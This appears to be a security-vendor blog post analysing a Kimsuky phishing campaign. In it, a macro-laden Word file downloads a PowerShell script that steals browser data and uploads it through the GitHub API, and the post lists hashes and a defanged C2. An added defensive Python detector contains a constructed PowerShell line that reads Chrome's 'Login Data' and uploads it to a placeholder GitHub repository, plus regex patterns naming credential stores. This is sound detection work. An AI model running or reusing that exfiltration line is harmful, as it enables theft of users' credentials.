Kimsuky Group Distributes Malware Disguised as Profile Template (GitHub)

AhnLab Security Emergency response Center (ASEC) has confirmed the distribution of a malicious Word file disguised as a profile template from emails impersonating a certain professor.

The password-protected Word file that was discovered is named ‘[Attachment] Profile Template.doc’, with the password itself included in the body of the email.

Figure 1. Original email

Figure 2. Part of the Word file contents

Figure 3. File properties

A malicious VBA macro is contained within the Word file, which, upon being activated, connects to a C2 via PowerShell before downloading and executing an additional script.

Figure 4. Part of the malicious VBA macro code (obfuscation removed)

The malware that is ultimately executed is the same type as the one identified in ‘Malicious Word Document Being Distributed in Disguise of a News Survey’, as it collects the information saved in browsers.

Figure 5. Part of the final script code

However, unlike the previous code, which used FTP to leak user credentials, the current version has been confirmed to be an altered script that uses the GitHub API to transmit the information to a certain repository.

Figure 6. Collected information transferred through GitHub API (part of the final script code)

Data gathered from victims is believed to have been uploaded to the GitHub repository in question.

Figure 7. Data uploaded to GitHub
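As an added detection example (not code from the ASEC post or the analysed script), the following Python checks PowerShell ScriptBlock log entries for the combination the article describes: access to a browser credential store together with an upload to a GitHub repository's contents API. The sample log entries, the owner/repo names and the token are constructed placeholders.

```python
import re

# Constructed sample ScriptBlock log entries (not taken from the ASEC post).
# Entry 1 mimics the behaviour described in the article; entry 2 is benign GitHub automation.
SAMPLE_SCRIPTBLOCKS = [
    {"id": 1, "text": (
        '$u="https://api.github.com/repos/<placeholder-owner>/<placeholder-repo>/contents/$env:COMPUTERNAME.txt";'
        '$d=[Convert]::ToBase64String([IO.File]::ReadAllBytes("$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data"));'
        'Invoke-RestMethod -Uri $u -Method PUT -Headers @{Authorization="token <placeholder>"} -Body (@{message="x";content=$d}|ConvertTo-Json)'
    )},
    {"id": 2, "text": 'Invoke-RestMethod -Uri "https://api.github.com/repos/octocat/hello-world/releases/latest"'},
]

INDICATORS = {
    # GitHub "create or update file contents" endpoint used as an upload dead-drop
    "github_contents_api": re.compile(r"api\.github\.com/repos/[^/\s\"']+/[^/\s\"']+/contents/", re.I),
    "put_method": re.compile(r"-Method\s+[\"']?PUT", re.I),
    "base64_encode": re.compile(r"ToBase64String", re.I),
    # Browser credential/cookie stores, matching the "collects browser information" behaviour
    "browser_store": re.compile(r"Login Data|logins\.json|Web Data|Cookies", re.I),
}


def classify(text):
    """Return the matched indicator names and a verdict for one ScriptBlock text."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Writing to a repo's contents endpoint AND reading a browser store is the
    # combination that separates exfiltration from ordinary GitHub API usage.
    if {"github_contents_api", "browser_store"} <= set(hits):
        verdict = "exfil_to_github"
    elif "github_contents_api" in hits and "put_method" in hits:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"hits": hits, "verdict": verdict}


def scan(entries):
    """Classify a list of {'id', 'text'} log entries, preserving their ids."""
    return [{"id": e["id"], **classify(e["text"])} for e in entries]


if __name__ == "__main__":
    for result in scan(SAMPLE_SCRIPTBLOCKS):
        print(result)
```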

Additionally, a case has recently been confirmed in which the Red Eyes threat group (also known as APT37, ScarCruft) also used GitHub as a malware distribution site (refer to the references below).

As these scripts are continuously evolving, like the one covered in this post, users are advised to take extra caution.

[File Detection]
Downloader/DOC.Generic (2023.02.22.02)
Trojan/PowerShell.FileUpload.S2023 (2023.02.25.00)

[IOC]

MD5
A25ACC6C420A1BB0FDC9456B4834C1B4
393CBA61A23BF8159053E352ABDD1A76

C2
hxxp://hmcks.realma.r-e[.]kr/gl/ee.txt

[References]

1) https://blog.sekoia.io/peeking-at-reaper-surveillance-operations-against-north-korea-defectors/

2) https://thehackernews.com/2023/03/scarcrufts-evolving-arsenal-researchers.html


The post Kimsuky Group Distributes Malware Disguised as Profile Template (GitHub) appeared first on ASEC BLOG.
